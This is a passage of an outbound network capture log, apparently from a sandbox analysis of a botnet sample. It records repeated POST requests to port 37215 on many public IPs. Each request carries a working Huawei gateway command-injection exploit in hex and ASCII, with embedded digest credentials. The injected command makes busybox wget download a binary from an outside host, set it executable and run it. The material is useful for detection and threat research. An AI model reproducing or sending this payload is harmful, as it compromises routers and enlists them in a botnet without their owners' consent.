                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            470192.168.2.1560330197.30.228.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784471989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            471192.168.2.1559282197.187.140.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784507990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            472192.168.2.1557164197.177.182.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786320925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            473192.168.2.1533474197.127.142.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786346912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            474192.168.2.1540206197.217.22.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786366940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            475192.168.2.153567041.196.64.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786420107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            476192.168.2.155238041.83.53.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786437035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            477192.168.2.1559638197.38.56.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786443949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            478192.168.2.154343241.43.146.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786464930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            479192.168.2.155234241.121.179.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786493063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 